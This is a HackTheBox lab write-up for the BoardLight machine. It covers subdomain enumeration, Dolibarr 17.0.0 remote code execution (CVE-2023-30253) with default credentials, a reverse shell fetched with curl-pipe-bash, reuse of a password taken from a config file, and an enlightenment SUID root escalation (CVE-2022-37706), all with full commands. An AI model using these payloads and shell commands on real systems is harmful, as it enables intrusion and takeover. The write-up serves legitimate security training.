BoardLight from HackTheBox

BoardLight from HackTheBox

This box involves exploiting Dolibarr 17.0.0 for remote code execution (RCE) as an authenticated user, gaining access as the www-data user. By understanding the exploit and examining the configuration files, credentials can be found to escalate privileges to user. Additionally, the system is vulnerable to CVE-2022-37706, which allows for further privilege escalation providing root access.

Nmap scan

First, we start by checking open ports

nmap -sV -sC 10.10.11.11 -v
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have web and ssh services running.

Web enumeration

Checking the page source, I've found a domain

โ””โ”€$ curl -s http://10.10.11.11 |grep htb
                [email protected]
      <a href="https://html.design/">Board.htb</a>

We can add it to the hosts file

echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts

And we have a comment in the page

curl http://board.htb | grep '<!'
  <!-- Basic -->
  <!-- Mobile Metas -->
  <!-- Site Metas -->
  <!-- slider stylesheet -->
  <!-- slider stylesheet -->
  <!-- bootstrap core css -->
  <!-- fonts style -->
  <!-- Custom styles for this template -->
  <!-- responsive style -->
    <!-- header section strats -->
                <!--   <a class="nav-link" href="portfolio.php"> Portfolio </a> -->

The http://board.htb/portfolio.php exist but we don't know the parameters. I've tried to bruteforce them without any luck.

Subdomain enumeration

This step was really tricky. I am not really sure why gobuster failed so I've tried multiple times with ffuf and finally got a hit

ffuf -w  /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt  -H "Host: FUZZ.board.htb" -fw 6243 -u http://board.htb
 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 6243
________________________________________________

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 107ms]

We can add this subdomain to the hosts as well

echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts

CVE-2023-30253

Checking the page http://crm.board.htb/

It's dolibarr 17.0.0 . Searching for CVE's related to this version quickly revealed the CVE-2023-30253

CVE-2023-30253 is a critical vulnerability in Dolibarr versions before 17.0.1, allowing remote code execution (RCE) via uppercase manipulation: <?PHP instead of <?php. Exploiting this RCE vulnerability requires an authenticated user to leverage exploit scripts and generate payloads, enabling dynamic content on the vulnerable target. Understanding the exploit is crucial for effectively exploiting the vulnerable target and executing commands to compromise the system.

First shell

I've searched for the default creds for dolibarr and it was admin:admin

Following the article from where I've found the CVE details , I was able able to get command execution!

So we can create a bash reverse shell

#!/bin/bash
bash -i >& /dev/tcp/10.10.16.x/4444 0>&1

Run a listener on port 4444

nc -vlp 4444

From another terminal, host the shell

python3 -m http.server

Going to http://crm.board.htb/website/index.php and create a website called test

Then creating a page called test

Finally click on Edit HTML source and insert the payload (adding the payload directly can work as well)

<?PHP echo system("curl http://10.10.16.x:8000/shell.sh | bash");?>
๐Ÿ’ก
Make sure to enable Show dynamic content

and got a shell back!

โ”€$ nc -vlp 4444
listening on [any] 4444 ...
connect to [10.10.16.x] from board.htb [10.10.11.11] 45992
bash: cannot set terminal process group (885): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ 

Second way

Searching for the exploit using poc-seeker

GitHub - 0xyassine/poc-seeker: automated tool designed to streamline the search and identification of Proofs of Concept (POCs)
automated tool designed to streamline the search and identification of Proofs of Concept (POCs) - 0xyassine/poc-seeker
-----------------------------
-> CVE id              : CVE-2023-30253
-> CVE description     : Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.
-> Base score          : 8.8
-> Attack complexity   : LOW
-> User interaction    : NONE
-> Required privileges : LOW
------------------------------

๐Ÿคž   Searching github                  DONE
๐Ÿคž   Searching sploitus                DONE
๐Ÿคž   Searching exploit db              DONE
๐Ÿคž   Searching vulnerability lab       DONE

๐Ÿ˜Ž I think I've found potential POC for you ๐Ÿ˜Ž 

[+] https://github.com/04Shivam/CVE-2023-30253-Exploit 
[+] https://github.com/Rubikcuv5/cve-2023-30253 
[+] https://github.com/g4nkd/CVE-2023-30253-PoC 
[+] https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253 

๐Ÿง You may have a look at the following ๐Ÿง 

[!] -
[!] https://github.com/04Shivam/CVE-2023-30253
[!] https://github.com/andria-dev/DolibabyPhp
[!] https://github.com/dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253

Trying the first POC works!

โ”€$ python3 CVE-2023-30253.py 
Enter the domain name (eg: app.hackthebox.com)
>>>crm.board.htb
Enter the ip address for reverse shell
>>>10.10.14.x
Enter port number for reverse shell
>>>4444
[+] Username password used admin:admin
[+] Extracted CSRF Token
[+] Logged In successfully
[+] Website created successfully
[+] Page created successfully
[+] Payload uploaded
[+] Payload Execution Url: http://crm.board.htb/public/website/index.php?website=0e1fef09ad10419da88c72f0d7e986d9&pageid=4
[+] Check your listner
[+] Payload Executed

Own user

Trying to list the files and dirs

www-data@boardlight:~/html/crm.board.htb/htdocs$ ls -lht 
ls -lht 
total 576K
drwxr-xr-x   2 www-data www-data 4.0K May 17 00:18 conf
drwxr-xr-x  11 www-data www-data 4.0K Mar  4  2023 accountancy
drwxr-xr-x   9 www-data www-data 4.0K Mar  4  2023 adherents
drwxr-xr-x   6 www-data www-data 4.0K Mar  4  2023 admin

the conf dir modification date is interesting. Checking the config files

www-data@boardlight:~/html/crm.board.htb/htdocs$ cat conf/conf.php
cat conf/conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';

Found a password: serverfun2$2023!!

To get the user, we can just check the /home (HackTHeBox style), or check the users that have login shell in /etc/passwd

ls /home
larissa

Trying to ssh with the user larissa with the found password worked!

โ””โ”€$ ssh [email protected]
The authenticity of host 'board.htb (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'board.htb' (ED25519) to the list of known hosts.
[email protected]'s password: 
...
larissa@boardlight:~$ wc -c user.txt 
33 user.txt

Own root

Executing linpeas revealed few unknown setuid binaries

PEASS-ng/linPEAS at master ยท peass-ng/PEASS-ng
Privilege Escalation Awesome Scripts SUITE (with colors) - peass-ng/PEASS-ng
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ SUID - Check easy privesc, exploits and write perms
โ•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr  8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)

This can also be done using:

find / -perm -4000 2>/dev/null

Checking the enlightenment version:

enlightenment --version
ESTART: 0.00002 [0.00002] - Begin Startup
ESTART: 0.00090 [0.00088] - Signal Trap
ESTART: 0.00115 [0.00025] - Signal Trap Done
ESTART: 0.00243 [0.00127] - Eina Init
ESTART: 0.00359 [0.00116] - Eina Init Done
ESTART: 0.00360 [0.00001] - Determine Prefix
ESTART: 0.00442 [0.00082] - Determine Prefix Done
ESTART: 0.00443 [0.00002] - Environment Variables
ESTART: 0.00444 [0.00001] - Environment Variables Done
ESTART: 0.00445 [0.00000] - Parse Arguments
Version: 0.23.1
E: Begin Shutdown Procedure!

The version is 0.23.1.

Searching for a CVE related to this version returns CVE-2022-37706

CVE-2022-37706 is a critical Linux vulnerability that allows local users to escalate privileges by manipulating pathnames in a system library.

Create a directory with a name that exploits the pathname vulnerability. This directory structure includes "/dev/../tmp/;", which is treated by the vulnerable function in a special way, followed by /tmp/exploit

mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

Create the exploit script:

echo "/bin/bash" > /tmp/exploit
chmod a+x /tmp/exploit

Executing the exploit:

/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
  1. /usr.../.. /bin/mount: Executes the mount command through a potentially vulnerable function stored in the variable file.
  2. -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u): Various mount options. The critical part here is uid=$(id -u), which runs the mount command with the current user's ID.
  3. "/dev/../tmp/;/tmp/exploit" /tmp///net: The key part of the exploit. This path exploits the pathname handling vulnerability to execute /tmp/exploit (which contains /bin/bash), giving the attacker a root shell.
larissa@boardlight:~$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
mount: /dev/../tmp/: can't find in /etc/fstab.
root@boardlight:/home/larissa# 
root@boardlight:/home/larissa# wc -c /root/root.txt 
33 /root/root.txt
root@boardlight:/home/larissa#

Finally the box is owned!

buy me a coffe